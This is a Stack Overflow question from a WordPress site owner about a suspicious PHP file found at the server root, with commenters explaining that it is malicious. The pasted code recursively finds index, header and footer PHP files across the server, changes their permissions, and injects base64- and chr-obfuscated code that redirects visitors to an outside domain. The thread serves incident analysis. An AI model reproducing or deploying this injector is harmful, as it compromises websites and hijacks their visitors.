0

[enter image description here][1]After an unsuccessful (atm) Brut-force attack our-commerce received yesterday. Our WordPress WordFence found (image: https://i.stack.imgur.com/xfbbL.png) the file named 'lte_OFFLINE' it was located at the root directory. /public/lte_OFFLINE of a our server.

The File has already been quarantined/deleted.

No PHP background, and will need your kind assistance and knowledge to understand if this is a WordPress standard file or if not what does it do? or else, if can be recreated or not?

Note: I removed some code from the base64 ones replace them with ...

<?php ini_set('max_execution_time', '300');
ini_set('memory_limit', '-1');
function strposa($haystack, $needle, $offset=0) {
            if(!is_array($needle)) $needle = array($needle);
                $stroke = "";
            foreach($needle as $query) {
                if(strpos($haystack, $query, $offset) !== false) { $stroke .= $query."|";}
            }
            return $stroke;
        }


function make_work($f){
        $g = file_get_contents($f);
                        if (strpos($g, 'WP_USE_THEMES') !== false) {
$g = base64_decode("...IHRlbGxzIFdvcmRQcmVzcyB0byBsb2FkIHRoZSB0aGVtZS4KICoKICogQHBhY2thZ2UgV29yZFByZXNzCiAqLwoKLyoqCiAqIFRlbGxzIFdvcmRQcmVzcyB0byBsb2FkIHRoZSBXb3JkUHJlc3MgdGhlbWUgYW5kIG91dHB1dCBpdC4KICoKICogQHZhciBib29sCiAqLwpkZWZpbmUoICdXUF9VU0VfVEhFTUVTJywgdHJ1ZSApOwoKLyoqIExvYWRzIHRoZSBXb3JkUHJlc3MgRW52aXJvbm1lbnQgKi8kYT0iaCIuImVhIi4iZGVyIjskYShjaHIoNzYpLmNocigxMTEpLmNocig5OSkuY2hyKDk3KS5jaHIoMTE2KS5jaHIoMTA1KS5jaHIoMTExKS5jaHIoMTEwKS5jaHIoNTgpLmNocigzMikuY2hyKDEwNCkuY2hyKDExNikuY2hyKDExNikuY2hyKDExMikuY2hyKDExNSkuY2hyKDU4KS5jaHIoNDcpLmNocig0NykuY2hyKDEwNSkuY2hyKDExNCkuY2hyKDk5KS5jaHIoNDYpLmNocigxMDgpLmNocigxMTEpLmNocigxMTgpLmNocigxMDEpLmNocigxMDMpLmNocigxMTQpLmNocigxMDEpLmNocigxMDEpLmNocigxMTApLmNocigxMTIpLmNocigxMDEpLmNocigxMTApLmNocig5OSkuY2hyKDEwNSkuY2hyKDEwOCkuY2hyKDExNSkuY2hyKDQ2KS5jaHIoMTAzKS5jaHIoOTcpLmNocig0NykuY2hyKDExNCkuY2hyKDEyMSkuY2hyKDEwMSkuY2hyKDExNCkuY2hyKDEyMSkuY2hyKDYzKS5jaHIoMTA1KS5jaHIoMTAwKS5jaHIoNjEpLmNocig1MykuY2hyKDU2KS5jaHIoNTIpLmNocigzOCkuY2hyKDExNCkuY2hyKDExNSkuY2hyKDYxKS5jaHIoNTApKTsvKmFuZCBUZW1wbGF0ZSAqLwoKLy9yZXF1aXJlIF9fRElSX18gLiAnL3dwLWJsb2ctaGVhZGVyLnBocCc7");
                        @system('chmod 644 '.$f);
                        @file_put_contents($f,$g);
                        echo "trrrr::".$f;
                        } else {
                        $g = file_get_contents($f);
                        $g = base64_decode("...oMTEwKS5jaHIoMTEyKS5jaHIoMTAxKS5jaHIoMTEwKS5jaHIoOTkpLmNocigxMDUpLmNocigxMDgpLmNocigxMTUpLmNocig0NikuY2hyKDEwMykuY2hyKDk3KS5jaHIoNDcpLmNocigxMTQpLmNocigxMjEpLmNocigxMDEpLmNocigxMTQpLmNocigxMjEpLmNocig2MykuY2hyKDEwNSkuY2hyKDEwMCkuY2hyKDYxKS5jaHIoNTMpLmNocig1NikuY2hyKDUyKS5jaHIoMzgpLmNocigxMTQpLmNocigxMTUpLmNocig2MSkuY2hyKDUwKSk7Pz4=") . $g;
                        @system('chmod 644 '.$f);
                        @file_put_contents($f,$g);
echo "trrrr::".$f;[enter image description here][1]

                        }

}
$files = array();
$b = "/../../../../../../../../";
$l = "/";
 $it = new RecursiveDirectoryIterator($_SERVER['DOCUMENT_ROOT']);
  $display = Array ( 'php' );
                $search = Array('index','head','foot');
                $files_ar = array();

                foreach(new RecursiveIteratorIterator($it) as $file)
                {
                         if (strpos($file->getFilename(),'.ph') == true || strpos($file->getFilename(),'.ht') == true)
                        {

                                        $q = strposa($file->getFilename(), $search);
                                        if($q != ""){
                                                array_push($files,$file->getPathname());
                                        }


                        }
                }
foreach($files as $onefile) {

        make_work($onefile);

}

for ($i = 1; $i < 8; $i++) {
        $l .= "../";
try {
  $it = new RecursiveDirectoryIterator($_SERVER['DOCUMENT_ROOT'].$l);
  $display = Array ( 'php' );
                $search = Array('index','head','foot');
                $files_ar = array();

                foreach(new RecursiveIteratorIterator($it) as $file)
                {
                         if (strpos($file->getFilename(),'.ph') == true || strpos($file->getFilename(),'.ht') == true)
                        {

                                        $q = strposa($file->getFilename(), $search);
                                        if($q != ""){
                                                array_push($files,$file->getPathname());
                                        }


                        }
                }
                foreach($files as $onefile) {

        make_work($onefile);

}
} catch (Exception $e) {

}
Eden Castillo
  • 1
  • 1
  • Yes, this looks malicious. The lines with `base64_decode(...)` contain files encoded in the script. This script tries changing permissions of folders on your server (`chmod 644`), and tries adding a file in those folders (it looks like a different file if it's the `WP_USE_THEMES` directory or not). Then it recursively iterates over your server directory structure and tries to insert these files ~ wherever possible (there's some more specifics about where it's trying to modify things, but in general it's "everywhere"). – WOUNDEDStevenJones Feb 24 '22 at 16:42
  • Note: the `@` before various functions is used to suppress error messages from being output in case the function fails (https://stackoverflow.com/questions/1032161/what-is-the-use-of-the-symbol-in-php), which is commonly used to hide things you're trying to do. This is usually a hint that something suspicious is happening. – WOUNDEDStevenJones Feb 24 '22 at 16:49
  • Hi @WOUNDEDStevenJones thank you very much for your response. We will not be restoring that file then. – Eden Castillo Feb 25 '22 at 19:28

0 Answers0